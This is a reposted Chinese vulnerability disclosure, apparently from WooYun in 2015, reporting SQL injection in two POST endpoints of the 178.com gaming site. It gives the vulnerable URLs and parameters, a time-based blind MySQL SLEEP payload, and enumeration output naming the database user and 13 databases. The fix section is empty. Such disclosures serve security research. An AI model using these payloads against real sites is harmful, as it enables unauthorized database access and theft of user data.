记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

178游戏网某处存在SQL注射漏洞

2015-12-22 04:00

code 区域
需登录:

1,

http://i.178.com:80/~sms.cartoon.cancelSubscribe (POST)



subid=1&_=





2,

http://i.178.com:80/~game.newgame.add_wl (POST)



action=sreach&s1=type&s2=1&title=Mr.&type_sreach=1

漏洞证明:

code 区域
---

Parameter: subid (POST)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 OR time-based blind (SELECT)

Payload: subid=1 OR (SELECT * FROM (SELECT(SLEEP(5)))lVdZ)&_=

---

back-end DBMS: MySQL 5.0.12



current user: '[email protected] %'

available databases [13]:

[*] game

[*] information_schema

[*] sns2

[*] sns_admin

[*] sns_album

[*] sns_api

[*] sns_bet

[*] sns_blog

[*] sns_cite

[*] sns_get_armory

[*] sns_group

[*] sns_gsrank

[*] test

修复方案:

~~


知识来源: www.wooyun.org/bugs/wooyun-2015-0152049

阅读:111303 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“178游戏网某处存在SQL注射漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云